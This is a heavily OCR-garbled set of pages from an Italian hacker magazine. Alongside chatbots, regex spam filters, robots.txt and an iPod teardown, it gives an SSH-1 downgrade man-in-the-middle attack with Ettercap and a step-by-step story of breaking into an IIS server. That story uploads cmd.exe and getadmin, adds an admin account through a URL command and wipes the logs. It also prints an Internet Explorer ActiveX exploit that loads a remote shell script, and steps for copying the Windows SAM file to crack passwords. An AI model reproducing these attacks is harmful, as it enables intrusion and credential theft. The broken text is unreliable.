re su Create a Bot e poi su Start Here, It's 
Freel. Ci sono servizi-bot a pagamento, 
ma quelli gratuiti bastano e avanzano per 
divertirsi un bel po'. 

BXBEZ 

Il sito lo chiama screen- 
name. Se non c'è, va fatto. Lo si può 
anche registrare al momento. 


verrà chiesta una registrazione e dovre¬ 
mo aspettare di autenticarci via mail. A 
questo punto bisogna scaricare un moto¬ 
re software, disponibile per Windows e, 
in Java, su Linux e Mac OS X. Poi, final¬ 
mente, comincia lo spasso. 


Il meccanismo del bot è molto sem- 
pli 


si fornisce una lista di parole o 
i frasi a cui si vuole che il bot sappia 
rispondere, e una lista di risposte 


La pagina di partenza 
di Runabot. Da qui si parte 
per costruire un proprio bot 
il più possibile umano. 


I UN’ÈVA DI NOME ELIZA 

I l primo programma in grado di sostenere una parvenza di conversazione è stato Eliza 
creato da Joseph Weizenbaum nel 1966. Eliza simula il parlare di uno psicanalista’ 
Non possiede nessuna vera intelli¬ 
genza ma si limita a riproporre paro¬ 
le già dette dal suo interlocutore, a 
cercare di fare parlare veramente lui. 

Comunque c'è gente che ci è casca¬ 
ta, almeno per un po’. 

Si può trovare Eliza in rete un po' dap¬ 
pertutto. Chi ha installato l'editor di 
testo Emacs ci trova dentro anche 
un’Eliza bello pronto (chi riesce a tro¬ 
varlo?). E in rete esistono un sacco 
di implementazioni di Eliza via Web. 
come quella in Java di Charles Hay- 
den (http://jerz.setonhill.edu/if/ 
canon/eliza.htm). 


Il mi parola 
o frase ehm 
rimesciuta Hi hai 
carrismi Unno una u più 
rispuste possibili 


possibili da cui il bot attingerà a caso. 
Più numerose sono le parole ricono¬ 
sciute e più varietà c’è nelle risposte, 
più il bot sembrerà naturale e riusci¬ 
rà persino a ingannare qualcuno per 
un po’. 

Il meccanismo è semplice e quindi il 
gioco non può durare all'infinito, ma 
un buon bot con due o tre amici veri 
intorno a rafforzare l’illusione consen¬ 
te di tirare qualche bello scherzetto! 


I più 


lei sorj 


I più pigri si limi¬ 
teranno a creare un bot e vederlo anda¬ 
re. Anche senza fornire risposte, infatti, 
ci sono alcune personalità fornite di serie 
(parlano inglese, però). 

Le funzioni a disposizio¬ 
ne sono molto più numerose e permet¬ 
tono tra l'altro di controllare l'accesso al 
bot, creare bot alimentati da più persone 
e altro ancora. Pagando, il servizio diven¬ 
ta veramente professionale, con bot gra¬ 
fici che si animano, parlano con voce sin¬ 
tetica e altro ancora. 

Se qualcuno crea un HJbot, ce lo faccia 
sapere. Ci chiacchieriamo volentieri. :-) 


chele Cam 
hele_ciJhack 


LINK PER APPROFONDIRE 
SUI BOT E SUL TEST DI TURING 

http://www.alanturing.net/ 

http://www-ai.ijs.si/cgi-bin/eliza/eliza_script 

http://www.alicebot.org/directory.html 

http://www.alicebot.org/ 

http://www.cybermecha.comAuringhub.html 

http://www.extempo.com/webbar/index.html 

http://www. lazytd. co m/lti/j u lia 

http://www.abenteuermedien.de/jabber- 

wock/index.php 

http://www.loebner.net/Prizef/loebner-pri- 
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SNIFFING 



Malti rita ago no aiia il prataoalla SS li Isocuro sitali] sia uaa stangarti 
sicura a iuattaccabile parche l’iatara camuaicaziaae à criptata, 
comprese lepassworti miiìlusiiine! 































































Dato che; attualmente' solo il protocol¬ 
lo 1 è vulnerabile a questa tipologia di 
attacco, si può rimuovere l'opzione 1 dal¬ 
la voce Protocol dei file di configurazio¬ 
ne ssh_config (client) e sshd config (ser¬ 
ver), in modo da garantire sempre e 
comunque la comunicazione con il pro¬ 
tocollo 2. Se si fosse sostituito il banner 
come nell'esempio preso in considera¬ 
zione, la connessione verrebbe rifiutata 
("ssh userauthl : server supports no auth 
methods"). 

Un altro metodo di protezione (scarsa- 
mente applicato e applicabile, soprattut¬ 
to nelle LAN di grandi dimensioni) consi¬ 
ste nefl'uMzxo di cache ARP statiche in ^ 
modo da prevenire attacchi ARP poiso- 
ning, come quelli alla base di questo 
esperimento. 

DklrKranz 
dktrkrartìjpliackBr jnurnal.it 


na effettuato un attacco di ARP poiso- 
ning, di modificare il payload dei pac¬ 
chetti in transito. Impostiamo quindi un 
nuovo filtro che sostituisca la stringa 
“SSH-1.99” proveniente dal server con 
"SSH-1.55" e la ritrasmetta al Client che 
crederà di poter comunicare solo con il 
protocollo 1. 

Ora può iniziare la comunicazione vera 
e propria; il server invia la sua chiave 
pubblica, Ettercap la intercetta, la sosti¬ 
tuisce al volo con la propria e la trasmet- 
taal Client, il quale procede all’autentica¬ 
zione normalmente e in modo traspa- 
rente!Y'username e la password sono 
inviati dal Client, 
intercettati e decrip¬ 
tati dalla chiave pri¬ 
vata di Ettercap cor- 
rispondente alla 
chiave pubblica che 
è stata precedente- 
mente inviata. 

Ora si completa il 
processo e si tra¬ 
smettono lo userna- 
me e la password al 
server con la sua 
chiave pubblica in 
modo che la con¬ 
nessione abbia 
effettivamente luo¬ 
go. Quindi abbiamo 
la chiave di sessio¬ 
ne in nostro pos¬ 
sesso e possiamo 
tranquillamente 


intercettare il traffico e decifrarlo con cal¬ 
ma. Tutto questo sembra molto compli¬ 
cato e laborioso ma in realtà (purtrop¬ 
po) non lo è! Basta solo un po’ di prati¬ 
ca e una buona lettura del manuale di 
Ettercap! 


Una protezione di ssh consiste nella 
memorizzazione della chiave pubbli¬ 
ca in un file (di salito known_hosts) e 
quindi viene stampato un messaggio di 
errore se quella 
ricevuta e quella 
memorizzata, non 
corrispondor 
Cor 

si evita' 
st£ o'stacolo^ 
che le normali ses¬ 
sioni avvengono 
quasi sempre con il 
protocollo 2 e in 
questo caso utiliz¬ 
ziamo il prótocollo 
1, il Client, non aven¬ 
do presumibilmente 
nessuna chiave 
pubblica di tale pro¬ 
tocollo registrata nel 
fila, non darà alcun 
-di avver¬ 
timento all'ignaro 
utente. 


ROBA DA LAMER 


za di SSH in una rete locale al fine di adot¬ 
tare le adeguate contromisure, non quello di 
intercettare le password degli utenti per alcun 
motivo; oltre a essere reato è anche etica¬ 
mente scorretto e una tecnica adottata solo 
dai lamer della peggior specie. 

A buon intenditore... 


Le comunicazioni SSH 
erano considerate 
a prova di bomba. 
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Home appare ettercap mentre sniffa la comunicarne 
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gaio 


forse oa po’ olii oso. 
Ma voleva dimostrare 
ili essere ioilipeotleote 
e, soprattotto, 
capace Pi 
oo 


E rano le due di notte e aveva scel¬ 
to quell'ora sapendo bene che 
in nessun ufficio al mondo, o 
quasi, qualcuno sarebbe stato lì 
a guardare cosa stava accadendo al 
server centrale. Era solo. I suoi genito¬ 
ri erano al mare e lo avevano lasciato a 
casa ad annoiarsi: ne erano gli unici con¬ 
vinti. Una decisione presa dopo molte 
discussioni fatte di silenzi e musi lunghi. 
Solo, d’estate, perché aveva ben altro 
da fare che passeggiare 
la sera, su affollati mar¬ 
ciapiedi di gente annoia¬ 
ta, con il cono gelato 
che sua madre gli 
avrebbe sicuramente 
propinato. “Devi cresce¬ 
re!" Gli sembrava di sen¬ 
tirla, ma in quel momen¬ 
to non la rimpiangeva. 

Solo, ma non annoiato. 


La risposta fu quasi immediata: 


Connected to 1uuj1iJ.eHample.com 
220 saturn Microsoft FTP Seruice 
(Uersion 3.0). 

User (luiuiu.eHample. corninone)): 


La fra'.trazione di non 
riuscir^» a legare più di 
tante, c jn amici, e ami¬ 


che, nemmeno sapeva 
cosa fosse. O forse sì, 
ma non se ne voleva 
rendere conto. Non 
quella notte... Johnny 
aveva installato a casa 
un server Windows NT. 

Sapeva benissimo che 
per sferrare un attacco 
a un sistema è necessari conoscerlo 


<101 «i 


Il messaggio era fin troppo esplicito, 
il Netbios installato su quel server era 
Saturn. Con un po’ di fortuna, se nessu¬ 
no aveva cambiato i parametri di base. 

una connessione anoni¬ 
ma gli avrebbe permes¬ 
so di entrare. E se così 
fosse stato sapeva che 
anche un altro dato era 
probabilmente rimasto di 
default: l'accesso come 
amministratore di siste¬ 
ma tramite l'account 
IUSFLSATURN. Ma ci 
avrebbe pensato dopo. 
Digitò anonymous e gli 
apparve: 


Password: 


Ecco una directory 
utile e non protetta: 
era dentro 


bene. Così aveva tutto quello che gli 
sarebbe servito Si collegò con un 
modem a 56K usando un qualunque 
account preso ai volo e con l 3 dinamico. 
Comunque più sicuro Apr i orompt 
comandi e si mise a lavoro. Sapeva che 
il suo obiettivo, www.exampte.com (usia¬ 
mo un nome fittizio anche se esistente), 
utilizzava un serve- Microsoft MS. Come 
faceva a saperlo? Perone aveva indivi¬ 
duato una frase serra in modo curioso 
all'interno del manuae r Enea dell'Inter¬ 
net Information Server d Microsoft, e 
dandola in pasto a Exo*e s era fatto una 
bella serie di qualche centinaio di indi¬ 
rizzi di computer, che s erano diligente¬ 
mente lasciati interrogare da: ootente 
motore di ricerca Scrisse C:\ftp 
www.example.com 


non ci mise molto a intui¬ 
re che non erano partico¬ 
larmente furbi e quindi un 
semplice ritorno a capo 
o la magica parolina 
“guest" gli avrebbe con¬ 
cesso di entrare, forse 
con qualche limitazione, ma nemmeno 
troppe. 


Ritorno a cap o 


Bingo! Era dentro. La strada era ancora 
lunga e in salita, ma era dentro. 

Fece qualche prova. No, non erano dei 
geni. Avevano lasciato quasi tutto nella 
directory /c, compresa la possibilità di 
usare il comando put e metterci dentro 
un file qualunque. 

Sicuramente un amministratore che ci 
teneva a fare in fretta ad accedere da 
casa, senza troppe configurazioni. 
Batté: 



































































e si fece dare un bell’elenco di directory 
e di file presenti. Notò subito la directory 
CGI-BIN. 

Con un po' di fortuna, se il permesso di 
eseguire programmi non era disabilitato 
a livello di “NTFS file-level security", 
avrebbe potuto far eseguire qualcosa 
tramite un semplice browser... 

Entrò nella directory CGI-BIN e scrisse 
put cmd.eHe. Era la sua notte fortunata: 

2DD PDRT command successiti!. 

150 Opening BINRRY mode data con¬ 
nection for CMD.EHE. 

226 Transfer complete. 

20B144 bytes seni in 0.06 seconds 
(3469.07 Kbytes/sec) 

Sorrise. Un altro put e installò getad- 
min.exe e gasys.dll . recuperati all’in¬ 
dirizzo http://www.ussrback.com/NT/ 
docs/getadmin.zip, un metodo fin trop¬ 
po facile per guadagnare l’accesso 
come amministratore di sistema di un 
server IIS. 

Il codice dei due software era stato scrit¬ 
to da un programmatore russo e ormai 
faceva parte della sua inseparabile cas¬ 
setta degli attrezzi. 

Si ricollegò a un account che aveva su 
AOL, cosi nel log di sistema del server 
IIS sarebbe apparso l’indirizzo IP del 
proxy di AOL, non il suo. 

Anche se non gli importava più di tanto, 
sapendo che di li a poco avrebbe potu¬ 
to cancellare ogni traccia della sua intru¬ 
sione. 

Tramite un browser, tentò di entrare 
come amministratore di sistema al pri¬ 
mo colpo, usando dei parametri di base: 

http://www.eHample.CDm/cgi- 

bin/getadmin.eHe?IUSR_SRTURN 

ma il sistema gli rispose con un laconi¬ 
co CGI errar. 

Decise allora di tentare la creazione di un 
nuovo account: 

http://www.eHample.com/cgi- 

bin/cmd.eHe?/c’7o20c:\winnt\syste 

m32\net.eHe7o20user7o20cnn7o20n 

ews7o20/add 



Ok, aveva appena creato un account 
"cnn" con la password "news". Da qui per 
guadagnare l’accesso come amministra¬ 
tore di sistema gli ri volle solo un secondo: 

http://www.eHample.com/cgi- 

bin/getadmin.eHe?cnn 

Si disconnesse da AOL e ricollegando¬ 
si al normale provider usò la funzione 
cerca computer www.example.com. 
Dopo circa due minuti apparve nell’elen¬ 
co. Clic destro ed esplora: gli apparve la 
finestra per inserire nome utente e pas¬ 
sword. Cnn, news: voilà. Dentro come 
amministratore. Ora poteva fare quello 
che voleva. Cancellò ogni traccia del suo 
passaggio dal file di testo dei log di siste¬ 
ma. Utilizzò LOphtcrack 
(http://www.IOpht.com/) per trovare tutte 
le associazioni tra utenti e password. 
Cambiò la data, usando l’URL: 

http://www.eHample.com/cgi- 

bin/cmd.eHe?/c7o20date7o2002/02 

/98 

e cancellò anche cmd.exe, getadmin. 
exe e gasys.dll, poi eliminò l’account cnn. 
Ormai aveva tutti gli user-ID e tutte le 
password di sistema. La prossima volta 
sarebbe entrato nel server come “legit¬ 
timo" amministratore. Erano le 2 e 45 
minuti, quando si distese nuovamente 
sul letto, pensando a sua madre che lo 
avrebbe certamente sgridato. Se non 
avesse finito di mangiare tutto il cono. 


UJriter Bus 



a Perché annoiarsi con 
un gelato se c’è di meglio 
da attaccare? 



0 effettuato realmen- 

e a un server americano nel giugno del 
1997, Microsoft venne avvertita dallo stesso 
hacker che lo portò a compimento, il 30 del¬ 
lo stesso mese. L’8 luglio rilasciò una patch 
di sistema che il pomeriggio dello stesso gior¬ 
no venne scardinata con metodi simili. 
Finalmente, dopo circa un mese e mezzo ven¬ 
ne distribuita un’altra patch, questa volta defi¬ 
nitiva e non attaccabile. Almeno fino a oggi, 



avrebbe potiti 

far 

mieosa tramite 
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EXPLOIT 



un BUCO 


Internet tnplnrer è cnme un tunnel sena sbocca: 
un bucn sena fine, tccn iimostratn l’ennesima 
vulnerabilità ni tnplnrer e bei contraili teliseli 


u i 


r' \ t 


B veramente possibile avviare 
programmi tramite l'utilizzo 
di un semplice Jscript? Cer¬ 
to! Come se non bastasse, 
Microsoft Internet Explorer è il 
protagonista di tutto ciò... ed 
ecco qui spiegata la tanto blasonata vul¬ 
nerabilità con relativo esempio pratico, a 
prova dell’ennesima falla. 

Iniziamo col prendere in considerazione 
il codice che permette di mandare in ese¬ 



cuzione arbitrariamente, tramite il noto 
browser Internet Explorer, cmd.exe (è 
solo un esempio, è possibile avviare qua¬ 
lunque applicazione) sottoforma di Acti¬ 
veX Control. 

function injectltO { 
document.frames[D].document.bo 


dy.insertRdjacentHTML(‘afterBe- 
gin’,’injected<script 
language = ”JScript’’ 0EFER>uar 
Dbj=neLU B.ctiueHObject(“Shell. 
Hpplìcation”);obj.ShellEHecute(“cm 
d.eHe’V’/c pause”);</script>’); 
} 

document.uiritefxiframe 

src=”sHeH!UJINOOlbS\MUeb\\TIP.KT 

M"x/iframe>’); 

setTimeóut{“inject I tO”, 1000); 

Notiamo che, tramite questo JScript 
ShellExecute (“cmd.exeY/c pause"); 


METODO MANUALE, Gl 


ER ESPERTI 


C on la massima attenzione, possiamo 
rimediare alla falla di Explorer toccando 
i registri di sistema con Start > Esegui > 
Regedlt. 

Rintracciamo la stringa: 

HKEY_l.nCflL_MRCHINE\SUFTlDR- 
RE\Microsof»\lnternet 
EHplnrer\RctiueH Compatibility 

Clic destro sù "ActiveXCompatibility". poi 
su "Nuovo”, "Chiave". 

Rinominiamo questa nuova chiave in: 
(0U0U0S66 0000-0010-8000- 
00RRnn602ER4) 

Clic destro sulla nuova chiave, poi ‘Nuovo ", 
"Valore DWORD - ' Rinominiamo questo valo¬ 
re in: “Compatibility Flags". 

Clic destro su "Compatibility Flags". poi 
“Modifica". 

Dentro la finestra per editare il valore di 
DWORD selezioniamo l'opzione Esadecima- 
le. poi specifichiamo dentro "Dati valore", il 
valore 400. quindi clic su ‘OK*. 

Chiudiamo. 


mandiamo in esecuzione addirit¬ 
tura cmd.exe, arbitrariamente 
sulla nostra macchina... 

Ora l'ipotetico attaccante 
potrebbe creare uno script che 
collega all'exploit: 

function getReaIShellO { 
myiframe.document.wri- 
t e ( “ < S C R I P T 
SRE>’http://ininin.pinco - 
pallino, it/shellscript.j 
s ’ > < \ / S C R I P T > ” ) ; 

} 

document.inrite(“<IFRRME 
ID = myiframe 
SRC=’about:blank’ LUIDTH=2D0 
HEIGHT = 200></IFRRME>”); 
setTimeout("getRealShell()”,100); 

Questo fa aprire un popup piccolissi¬ 
mo che manda in esecuzione l'exploit: 


myiframe.document.ujrite(“<SCRIPT 

SRC='http://ioinin.pincopallino.it/sh 
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JL or#qualcosa di particola- 


STRONGHIfiMOiD P 


0 Wjiafno già visto suLnunvft 
rò 54 di Hacker Journal 
alcune espressioni regola¬ 
ri base cl)e bloccano con 
grande efficacia molti mes¬ 
sagai àdtispam. Abbiamo 
visto comandi <&me 


Miri islruzim 

i ì ' 

Ibbiàmo già visto suLnum* di 


di andare a caccia di messaggi con 
attachment maligno a fondo mail: 


(?i)\.pif$ 


v[i1][@a]gra, che catturano tutte le varia¬ 
zioni. Il problema è che le varianti possi- 
ili sono infinite e che il lavoro diventa 
presto improbo. 


Questfjege* catturatine le occor- Però un buon programmatore 
reiiztglkjiil messe esattamente a fine ^Ékthon può decidere di definire meta 
riga (gli allegati .pif sono praticamente ^jattern, cioè sequenze preimpostate a 
sempre virus). cui assegniamo quello che vogliamo. 

Il comanda (?i) specifica di non distin- come fossero variabili. Decidiamo che il 
guere maWcole e minuscole. meta pattern i sta per [il] e che il meta 

patterà sta per [a@]. Così possiamo 
scrivere 


Jtte le occor- 


(?i)<\s*irng[-'>M?:loiu)?src\s*=\s* 
(?:T’)\s*http: 


che riconoscono qualunque tag 
<lpg> in HTML-tontenente un URL., 
Ora aggiungiamo indicazioni in più, a par¬ 
tire dagli operatori A e & che individuano ji 
rispettivamente ij piatto di ipizio riga e il 
.puntò di fine riga del testo. Un esempio 


nqa (oli ; 


guere man 
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COME FARE REGEX 
IN PYTHON 


T utto quello che c’è da 
sapere sulle espres¬ 
sioni regolari scritte in 
Python lo si trova alla 
fonte, ossia presso il sito 
ufficiale del linguaggio, 
precisamente all'indirizzo 
http://www.python 
org/doc/current/lib/re- 
syntax.html. 


> . • , ’ . re, non standard i meta pat- k 

à l(n buon programma’ ter/i. Funzionano così: spesso gì* V 

per gestire bene le regen _ * spammatori truccano le parole come 
sbttQ Linun è KRegEnpFditdr si fa t neì'nickname* scriveWo ^ 
(http://uJUJUJ.blackie.dk/ke * vi @gra al posto di viagra e cose 
E/KReqEupEditor/). . così Non è un problema ade- Jf 

. v . v . . .1 guàre le regex a queste 

V. \ • s y sifuaziohi, scrivendo 

concreto: vogliamo riconoscere tutti i sequenze come 
numeri IP Sicuri e mettere tutti gli altri . ‘ ‘ ’ . 

in una blacklist.' .... . ‘_' 


1 A 127\.0 


Se a inizio riga c’ejJa m 


numero che inizia con, g 
127.0 è certamente un > V 



IP sicuro (se inizia con ’> 


127 è un IP locale).- § * 

r 

Altrimenti, supponiamo 

\ A 


































Propcrty 
RtgExp 
T.tl« 

D«term»nisi»c 
Fil«namc 
Numbar of States 14 

Descoption stmpJt german 

Number of Tran 21 

Vanable Name pO 

Format DFA 


(0ni-9mi-2]!0. 
pO simple germ 


noie Output (System. ouf> 
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ESPRESSIONI REGOLARI 
ALIAS REGEX 


U na regex è una stringa di caratteri 
coditicata che in base a certe regole 
è capace di individuare parti specifiche 
di un testo in modo particolarmente intel¬ 
ligente. Gli esempi in questo articolo sono 
scritti con sintassi Python, ma qualunque 
linguaggio (come Perl) permette di scrive¬ 
re regex con sintassi uguale o molto simi¬ 
le. Per approfondire il tema consigliamo 
siti quali http://www.corsolinux.it/testi/ 
perl/analog/le_espressioni_regolari.jsp. 
Presso gli indirizzi http://weitz.de/regex- 
coach/ (Windows), http://txt2regex.sour- 
ceforge.net (Linux) e http://www.tooluser- 
soft.com/ (Mac OS X) si possono trovare 
programmi per scrivere regex. I fortunati 
con un sistema Unix possono farlo anche 
direttamente dalla Shell. 


Espressioni regolari 

K**™? U goffro 


bhh~L 


irremt>esfetJUÓ/UÌj7Tyjrege 
'-tester). M# è scritta 
i Jaua e quindi funziona . 
uqualunque carfiputer. * 


v(?#i)(?#a)gra dpfriettere di preoc- 
cuparqLQuando vogliamo arricchi¬ 
re il mtta pattern, arrichiamo la 
sua definizione e la sintassi della 
regex resta uguale. 


Questa non è uiffWUziprie-sta** 
W dard del linguaggio: anzi, la sin- 
/' tassi che abbiamo descritto è quella 
dei commenti di Python. M#si può fare. 
A patto di essere abbastanza bravi. 


Barg thè GffnTT 
gnoll@hackerjournal.it 


- - J > Komodo 

(ht tp:// ujuiuj. ac tiues ta te. co 
m/Products/Komodo/) è un 
ambiente di programmazione 
e sviluppo per UJin e L ifpju. 
Troveremo anche stjjÈMenti 
di controlla delleTtetfeff, 
































□ BillG 1010 

□ Admmistrator 500 

□ fredc 1011 


SECD9236D21095CE75842, 

73CC402BD3E791756C3D., 

3466C280487FE39A417EAF. 

89D42A44E7714DAAAAD3B. 
DBC5E5CBA8028091B79A., 
1C3A2B6D939A1021AAD3.. 
DCF9C AA6DBC 2F2DFAAD3. 


C04EB42B9F5B114C86, 

C7E2622D76D3F001CF, 

80030E356D15FB1942,, 

C5663434F963BE79C8, 

6B6E0FB2ED246885B9. 

E24106942BF38BCFS7. 

FA5664875FFADF0AF6,, 


1012 ? 7 *>” 

1001 AAA 

1002 AAAA 


GRUHHH 


Una utility 
che ci seruirà 
per scoprire 
le password 


n tutte le principali versioni di Win¬ 
dows, NT4, 2000 e Xp, il nostro 
oggetto del desiderio deve essere 
il file SAM (non ha estensione) che 
si trova in'C:\"WINDOWS" o 
"WINNT”\system32\config (in 

men¬ 


tile SAM per ottenere le pas¬ 
sword mentre in 2k/Xp 
dobbiamo anche copia¬ 
re il file SYSTEM (sem¬ 
pre nella stessa directory 
e anch’esso senza 
estensione) in quanto il 
file SAM è stato ulterior¬ 
mente crittografato (in 2k/Xp 
questa ulteriore misura di sicu¬ 
rezza è attuata di default men¬ 
tre in NT4 è attivabile a piacere) e 
l'unico modo per ottenere le pas¬ 
sword del sistema è prelevarlo insie¬ 


Per passare dalla directory A:, neira 
quale ci troviamo appena dopo il boot 
col floppy, a quella di nostro interesse 
eseguiamo il seguente comando: 
cd .C:\-WINDOWS- o 

'WINNT"\system32\config (Se il sistema 
è NT4/2k scegliamo ‘WINNTL se è inve¬ 
ce Xp scegliamo “WINDOWS"). 

Ecco che adesso dobbiamo fare una 
distinzione tra Windows NT4 e Xp/2k: 
infatti in NT4 è ora sufficiente cdpiare il 


NT4/2k si trova in C:\WINDOWS. 
tre’in Xp si trova in C:\WINNT...) che con¬ 
tiene le password di accesso al sistema, 
crittografate (hash). 

Ne esiste poi urrà copia in C.Y'WIN- 
DOWS" o “WINNT’Vepair. Spesso però 
non è aggiornata in quanto è quella crea¬ 
ta durante l’installazione del sistema ope¬ 
rativo e contiene le password che immet¬ 
tiamo alla richiesta iniziale di immissio¬ 
ne degli utenti. Il file SAM in CiV'WIN- 
DOWS" o “WINNT '\system32\config 
(quello di maggior interesse) non può 
essere prelevato quando Windows è in 
esecuzione perchè è utilizzato dal siste¬ 
ma stesso. 

Il file SAM in C:\"W!NDOWS" o 
"WINNTVepair può essere invece pre¬ 
levato con facilità ed essere copiato su 
un floppy per poi essere crakkato con 
calma. Però sappiamo che non è neces¬ 
sariamente aggiornato. 

Eeco allora come prelevare il più sicuro 
file SAM in C:\"WINDOWS” o 
"WINNT"\system32\config. Innanzitutto 
creiamo un floppy di boot, compatibile 
con partizioni NTFS, se la nostra parti¬ 
zione è tale, riavviamo il sistema e faccia¬ 
molo partire nella modalità col prompt 
dei comandi MS-DOS, grazie al floppy di 
boot. È anche possibile prelevare- il file 
SAM facendo il boot del sistema con una 
distribuzione Linux live come Knoppix 
3.3, ma è preferibile utilizzare MS-DOS. 


me al SAM (vedremo successivamente 
come utilizzarlo). Eseguiamo quindi, se 
siamo in Windows NT4, il comando: 
copy CAWINNT\system32\config\SAM 

A:. ; 

Se siamo al contrario in Win 2k/Xp ese¬ 
guiamo il comando: 

copy C:\" WINDOWS" o 


Fte V*w 2 

A - o 

-IDI *1 

U»ern«m« | AID ! *T»! 

iss»wd r LMHash 1 NTH«5h 

































































SPIDER 




PERCHE DRIBBLARE I MOTORI 

A prima vista escludere il nostro sito dai 
motori di ricerca è roba da fessi. Cosi 
non ci trovano! Invece ci sono motivi sensa¬ 
ti. Per esempio, alcuni webmaster operano 
in modo da nascondere ai motori di ricerca 
le pagine dei guestbook, che essendo scrit¬ 
te in modo non organizzato possono pena¬ 
lizzare il sito presso un motore. 
Paradossalmente, nascondere alcune pagi 
ne di un sito può aiutare a valorizzare il sito 
sui motori. Un altro uso possibile è nascon 
dere le pagine provvisorie e incomplete che 
vanno ancora completate. Ci sono tante altre 
ragioni possibili, oltre naturalmente ai dati 
confidenziali. 


ERAN TRECENTO... 

G li spider attivi conosciuti, l'ultima vol¬ 
ta che abbiamo controllato, erano qua¬ 
si trecento. Il loro elenco aggiornato si tro¬ 
va alla pagina http://www.robotstxt. 
org/wc/active/html/index.html. 

Questo è l’elenco: 


1 ABCdatos BotLInk 

2. Acme.Spider 

3. Ahoy! The Homepage Finder 

4. Alkaline 

5. Anthill 

6. Walhello appiè 

7. Arachnophilia 

8. Arale 

9. Araneo 

10. AraybOt . 

11. ArchitextSpider J 

12. Aretha 

13. ARIADNE I j 

14. arks 

15. ASpider 









MIO HACKING 



RAGNETTI NON SEMPRE FASTIDIOSI 


S pider vuol dire ragno e 
uno dei suoi significa¬ 
ti ulteriori è: programma 
che esplora ogni angolo 
della Rete per conto di un 
motore di ricerca, allo sco¬ 
po di individuare pagine da 
indicizzare. Viene anche 
detto crawler. In inglese 
crawl è il nostro stile libero 
nel nuoto. To crawl signifi¬ 
ca avanzare un arto per vol¬ 
ta. Uno spider di per sé non 
fa danno, a patto che accet¬ 
tiamo di fare indicizzare le 
nostre pagine Web. 



D I file robots.txt viene usato per 
togliere il permesso ai motori di 
ricerca, tutti o alcuni in modo 
specifico, di indicizzare le pagi¬ 
ne Web del nostro sito. Il file deve 
chiamarsi robots.txt e deve essere, 
come spiega l’estensione, un normalissi¬ 
mo file di testo. 

La sintassi del file, sintetizzata, è 
semplice: 


User-agent: nomi degli spider 
Disallouj:/name del file 


Nel caso in cui 


User-agent: * 


L'asterisco significa "tutti gli spider". 
Verrà negato il permesso di indicizzazio¬ 
ne a qualsiasi motore di ricerca. 

Ogni riga Disallow può contenere un solo 
nome file, come in 


Disalloiu:/pagina.html 

DisalloLu:/altrapagina.html 

□isallQLu:/terzapagina.html 



A 


- ♦ 


e via dicendo. È possibile, tuttavia, bloc¬ 
care una directory intera in un solo colpo: 


□isallouj:/nomedirectarg/ 


Attenzione a ricordare lo slash in 
fondo al comando! 


Acces sori e op tional 

Per controllare se la sintassi del file 
è corretta possiamo farci aiutare da Sear- 
chengineworld.com, che ha una pagina 
apposta all'Indirizzo http://www.searchen- 
gineworld.com/cgi-bin/robotcheck.cgi. 

Invece troviamo un elenco aggiorna¬ 
to di nomi di spider alla pagina. 
http://www.robotsbct.org/wc/active/html/in 
dex.html. È essenziale, perché se non 
sappiamo come si chiama lo spider non 
siamo in grado di usare il file. 

Infine, se proprio siamo pigri, a 
http://www. rietta.com/robogen/ troviamo 
un programma shareware da 20 dollari 
che permette di impostare le regole di 
esclusione in forma grafica e genera 
automaticamente il file robots.txt. éà 


da p 24 

24. BlackWidow 

25. Die Blinde Kuh 

26. Bloodhound 

27. Borg-Bot 

28. bright.net caching robot 

29. BSpider 

30. CACTVS Chemistry Spider 

31. Calif 

32. Cassandra 

33. Digimarc Marcspider/CGI 

34. Checkbot 

35. ChristCrawler.com 

36. churl 

37. cleNclaFiCcloN.nEt 

38. CMC/0.01 

39. Collective 

40. Combine System 

41. Conceptbot 

42. ConfuzzledBot 

43. CoolBot 

44. Web Core / Roots 

45. XYLEME Robot 

46. Internet Cruiser Robot 

47. Cusco 

48. CyberSpyder Link Test 

49. CydraISpider 

50. Desert Realm Spider 

51. DeWeb(c) Katalog/lndex 

52. DienstSpider 

53. Digger 

54. Digital Integrity Robot 

55. Direct Hit Grabber 

56. DNAbot 

57. DownLoad Express 

58. DragonBot 

59. DWCP (Dridus’ Web Cataloging Project) 

60. e-collector 
.etc. 


IL RESTO DEI NOMI LO TROVATE SUL SITO DI HJ! 




















Pod 


Il hiirihe ti! toccare mila che 


i 


Me eoa mie 


0 


pple ha costruito l'iPod 
Bb in modo che non 
possa essere aperto e 
] avvisa che l'apertura 
IL non autorizzata del pla- 
■ I y 0r '"valida la garan¬ 

zia noi siamo hacker, 
curiosi e cauti, capaci 
non solo di stare attenti e di 
non rompere niente ma anche di rimet¬ 
tere tutto a posto come se niente fosse 
accaduto. 

Via allora! 


Il primo P0S6Ò è togliere il frontale . ... . 

Con un cacciavite bisogna Partendo dall angolo 
fare leva piano piano sotto il frontale, in e procedendo longo i la ti, 
punti diversi, fino a sbloccare le lamine smolliamo gradualmente 
che lo tengono incastrato in posizione. il frontale di plastica. 



































AUmenlazione 


Sotto la batteria lo spazio è interamente 
occupato dall'hard disk, un normale Tos¬ 
hiba in formato PC Card. 


% ; 


Quando un lato è libero, si 

può sollevare la parte principale dell’iPod 

e liberarla dal resto dell'involucro. 


▲ Una unita rimasso il caua 
di alimentazione non ci sono 
altri ostacoli uerso 
la dissezione totale dell’iPod! 


Per risistemare una batteria nuova, 
o quella vecchia, basterà una goccia di 
colla. Chiaramente una batteria nuova va 
attaccata al connettore. 


Ribaltiamo l'hard disk intorno al suo con¬ 
nettore e possiamo vedere la scheda 
logica, sotto. Più all'interno di così non si 
può andare! 


Gli iPod mini, quelli ancora più piccoli e colo¬ 
rati, non li abbiamo ancora aperti. Sembra 
più difficile. Ci sarà più soddisfazione! :-) 


P. Greco p.greca@hackerjaurnal.it 


Per essere 
una batteria 
è incredibilmente 
sottile. 
Uiene quasi 
da chiedersi 
come faccia 
funzionare 
il disco 
rigida! 


La batteria è 
incollata; pos¬ 
siamo staccarla 
sempre lavoran¬ 
do di cacciavite, 
delicatamente. 


A batteria 
rimossa, pos¬ 
siamo vedere il 
connettore del¬ 
l'alimentazione e 
il cuscinetto di 
gomma che 
supporta la bat¬ 
teria. Sempre 
con delicatezza, 
tiriamo il cavo di 
alimentazione 
per sconnetterlo 
dall'iPod. 



'S 


A Facciamo gentilmente leu a 
con il cacciauite. 


Batteria 


A questo punto 

potremo cambiare 

la batteria 

eoo ma lattaria 


A Panoramica sull'iPod dopo 
auere fatto ruotare 
la batteria dalla sua 
posizione originale. Sotto, 
chiara, c'è il disco rigido. 


La batte¬ 
ria uista 
da uicino. 
Quando 
uscirà il 
plager 
concor¬ 
